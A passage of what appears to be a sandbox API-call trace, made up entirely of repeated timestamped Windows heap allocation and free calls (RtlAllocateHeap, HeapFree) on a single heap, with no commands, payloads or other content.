wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0192.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0192.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0192.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.981] HeapFree (in: hHeap=0x2c0000, 